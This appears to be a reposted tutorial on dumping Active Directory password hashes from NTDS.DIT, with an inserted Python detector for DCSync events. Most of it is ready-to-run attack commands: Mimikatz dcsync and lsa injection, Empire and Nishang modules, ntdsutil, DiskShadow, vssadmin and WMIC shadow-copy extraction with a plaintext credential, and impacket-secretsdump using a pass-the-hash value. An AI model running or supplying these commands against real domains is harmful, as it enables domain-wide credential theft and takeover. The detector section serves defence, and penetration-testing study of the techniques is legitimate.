
How to derive a domain password hash

2024-03-04 Update From: SLTechnology News&Howtos



This article shows how to derive the hash values of domain passwords. It is meant to be easy to understand and clear, and I hope it helps resolve your doubts. Let me lead you through the article "how to derive the hash value of domain password".

In a domain, the password hashes are stored in NTDS.DIT. NTDS.DIT is a binary file that is the equivalent of the local computer's SAM file, and its location is %SystemRoot%\ntds\NTDS.DIT. It contains not only usernames and hashes but also OUs, groups and other directory information.

Like the SAM file, this file is locked by the operating system while it is running. Therefore it cannot simply be copied to another location to extract the information from it.

Here are some of the most common techniques used to extract information from .dit files:

1. Domain Controller Replication Services

2. Native Windows Binaries



Mimikatz has a feature (dcsync) that uses the Directory Replication Service (DRS) to retrieve password hashes from the NTDS.DIT file. This technique removes the need to touch the domain controller directly, because it can be executed from any domain-joined system running in a domain administrator context. It is therefore a standard red-team technique.

lsadump::dcsync /domain:pentestlab.local /all /csv

By specifying a domain user name with the /user parameter, Mimikatz dumps all account information for that user, including its hashes.

lsadump::dcsync /domain:pentestlab.local /user:test

Alternatively, Mimikatz can be executed directly on the domain controller to dump the password hashes through the lsass.exe process.

privilege::debug
lsadump::lsa /inject

At this point the password hashes of the domain users are retrieved.


PowerShell Empire has two modules that retrieve domain hashes through a DCSync attack. Both modules must be executed with domain administrator privileges, and both use the Microsoft replication service. They rely on the Invoke-Mimikatz PowerShell script to run the DCSync-related Mimikatz commands. The hash output format of the following module is similar to the output format of Metasploit's hashdump.

usemodule credentials/mimikatz/dcsync_hashdump

The DCSync module requires us to specify a user, and it then extracts all the information about that account.

After execution completes, we get the following information:


Nishang is a PowerShell attack framework: a collection of PowerShell attack scripts and payloads that is widely used in all stages of penetration testing. Its Copy-VSS script automates the extraction of the required files: NTDS.DIT, SAM and SYSTEM. These files are extracted to the current working directory or to a folder you specify.

Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\

Alternatively, you can execute the script from an existing Meterpreter session by loading the PowerShell extension.

load powershell
powershell_import /root/Copy-VSS.ps1
powershell_execute Copy-VSS

You can also use the powershell_shell command to open a PowerShell session, import the script and extract the files.

Copy-VSS
Copy-VSS -DestinationDir C:\Ninja

PowerSploit

PowerSploit contains a PowerShell script that uses the Volume Shadow Copy service to create a new volume from which the files can be extracted.

Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy

Or it can be executed from an existing Meterpreter session by loading the PowerShell extension.

powershell_shell
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy

You can use the copy command to copy files from the new volume to the destination.


Invoke-DCSync is a PowerShell script developed by Nick Landers. It leverages PowerView, Invoke-ReflectivePEInjection and PowerKatz to use Mimikatz's DCSync method to retrieve the hashes. Executing the function directly produces the following output:


You can see that the results are output in tabular form. If we add the -PWDumpFormat parameter, the output format becomes user:id:lm:ntlm:::


Run the script from an existing Meterpreter session to get the same output.

After adding the -PWDumpFormat parameter:
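As an added defensive counterpart to the DCSync techniques covered above (Mimikatz dcsync, Empire's dcsync_hashdump module and Invoke-DCSync), the following Python script, which is not from the original article, flags Security event 4662 records that request the directory replication extended rights from any principal other than an allow-listed domain controller account. The DC account names and the event records are constructed.

```python
# Flag DCSync-style replication requests in Security event 4662 records.
# Added example, not code from the original article. Events are constructed
# dicts mimicking parsed 4662 fields; the GUIDs are the real control-access
# rights a DCSync request exercises on the domain object.
import re

# Extended rights requested by DCSync (logged as Control Access, mask 0x100).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)
# Assumption: only the DCs' own machine accounts should replicate; any other
# principal, including a non-DC computer account, is suspicious. Constructed names.
DC_ACCOUNTS = {"PENTESTLAB\\DC01$", "PENTESTLAB\\DC02$"}

def find_dcsync_events(events, dc_accounts=DC_ACCOUNTS):
    """Return one alert per 4662 event that requests replication rights
    from a principal outside dc_accounts."""
    allowed = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
        if not rights:
            continue
        subject = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if subject.upper() in allowed:
            continue
        alerts.append({"subject": subject, "rights": rights})
    return alerts

# Constructed sample: routine DC-to-DC replication, a DCSync run as the user
# "test" (as in the article), an unrelated 4662, and a non-4662 event.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "PENTESTLAB", "SubjectUserName": "DC02$",
     "AccessMask": "0x100", "Properties": "Control Access\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "PENTESTLAB", "SubjectUserName": "test",
     "AccessMask": "0x100", "Properties": "Control Access\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "PENTESTLAB", "SubjectUserName": "test",
     "AccessMask": "0x10", "Properties": "Read Property\n{00000000-0000-0000-0000-000000000000}"},
    {"EventID": 4624, "SubjectDomainName": "PENTESTLAB", "SubjectUserName": "test"},
]

if __name__ == "__main__":
    for a in find_dcsync_events(SAMPLE_EVENTS):
        print(f"DCSync suspected: {a['subject']} requested {', '.join(a['rights'])}")
```

Auditing of "Directory Service Access" must be enabled on the domain controllers for 4662 to be logged at all; the event carries no client address, so pair a hit with the matching 4624 logon to find the source host.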


Ntdsutil is a command-line tool that is part of the domain controller ecosystem; its primary purpose is to make it easy for administrators to access and manage Windows Active Directory databases. However, it is often abused by penetration testers or red team members to obtain a snapshot of the existing ntds.dit file, which can then be copied to a new location for offline analysis and password hash extraction.

ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit

It generates two new folders: Active Directory and Registry. The NTDS.DIT file is saved to Active Directory, while the SAM and SYSTEM files are saved to the Registry folder.


DiskShadow is a Microsoft-signed binary that assists administrators in performing operations related to the Volume Shadow Copy Service (VSS). The binary has two modes, interactive and script, and a script can contain all the commands needed to automate the NTDS.DIT extraction process. Adding the following lines to a script file creates a new volume shadow copy, exposes it as a new drive, executes the copy command, and deletes the volume shadow copy.

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset

Note that the DiskShadow binary needs to be executed from the C:\Windows\System32 path. If it is called from another path, the script will not execute correctly.

diskshadow.exe /s c:\diskshadow.txt

Running the following command directly from the interpreter lists all the volume shadow copies available on the system.


The SYSTEM registry hive should also be copied, because it contains the keys needed to decrypt the contents of the NTDS file.

reg.exe save hklm\system c:\exfil\system.bak

WMI

Sean Metcalf demonstrated on his blog that the NTDS.DIT and SYSTEM files can be extracted remotely through WMI. This technique uses the vssadmin binary to create shadow copies.

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

It then executes the copy command remotely and extracts the NTDS.DIT file from the shadow copy to another directory on the target system.

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"

The same applies to the SYSTEM file.

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"

The extracted files are then transferred from the domain controller to another Windows system, where the domain password hashes are dumped.

PS C:\Users\test.PENTESTLAB> copy \\dc\c$\temp\ntds.dit C:\temp
PS C:\Users\test.PENTESTLAB> copy \\dc\c$\temp\SYSTEM.hive C:\temp

If you have generated a golden ticket, you can use it instead of credentials to authenticate to the domain controller through Kerberos.


The Volume Shadow Copy command-line utility (vssadmin) lets administrators back up computers, volumes and files even while the operating system is using those resources. Volume Shadow Copy runs as a service and requires the file system to be NTFS (the default file system of the Windows operating system). Executing the following command from a Windows command prompt creates a snapshot of the C: drive, which can then be copied to another location (a local folder, a network share, or removable media) to gain access to it.

vssadmin create shadow /for=C:

Since all the files on the C: drive have now been copied to another location (HarddiskVolumeShadowCopy1), they are no longer in use by the operating system and can be accessed and copied freely. Use the copy command to copy the NTDS.DIT and SYSTEM files to a new folder on the local drive named ShadowCopy.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy

These files then need to be copied from the domain controller to another host for further processing.


Tim Tomes developed vssown, a utility similar to vssadmin that can create and delete shadow copies, run arbitrary executables from unmounted shadow copies, and start and stop the shadow copy service.

cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
cscript vssown.vbs /delete

The required files can be copied using the copy command.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYSTEM C:\vssown
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM C:\vssown

Metasploit

The Metasploit framework has a module that authenticates directly to the domain controller over SMB, creates a system-driven shadow copy, and downloads copies of NTDS.DIT and the SYSTEM hive to the Metasploit directory. These files can then be used with other tools, such as impacket, to extract the Active Directory password hashes.


There is also a post-exploitation module that attaches to an existing Meterpreter session and retrieves the domain hashes through the ntdsutil method.


Alternatively, if you have an existing Meterpreter session on the domain controller, you can use the hashdump command. However, this method is not safe, because it is likely to crash the domain controller.


Fgdump is a tool for extracting LanMan and NTLM password hashes. If you have obtained local administrator credentials, it can be executed locally or remotely. During execution, fgdump attempts to disable any antivirus software running on the system and, if successful, writes all data to two files. If antivirus software is present, it is recommended not to use fgdump to dump password hashes, because it is flagged by the antivirus products of most security vendors (including Microsoft's Windows Defender).


The password hashes are retrieved by examining the contents of the .pwdump file.


Impacket is a set of Python scripts that can be used to perform a variety of tasks, including extracting the contents of the NTDS file. The impacket-secretsdump module requires us to provide the SYSTEM hive and the NTDS database file.

impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

In addition, impacket can remotely dump the domain password hashes from NTDS.DIT by authenticating with a computer account and its hash.

impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@

As an alternative to impacket, the NTDSDumpEx binary can extract domain password hashes from a Windows host.

NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

There is also a shell script, adXtract, that exports the usernames and password hashes in a format usable by common password crackers such as John the Ripper and Hashcat.

./ /root/ntds.dit /root/SYSTEM pentestlab

The script writes all the information to files named after the project name, and once the NTDS database file is decrypted, the user list and password hashes are exported to the console. The script provides a great deal of information about the domain users, as shown below.

The password hashes are displayed in the following format.

That is the whole content of the article "how to derive the hash value of domain passwords". Thank you for reading! I believe we all now have some understanding of the topic, and I hope the material shared here helps you. If you want to learn more, you are welcome to follow the industry information channel.
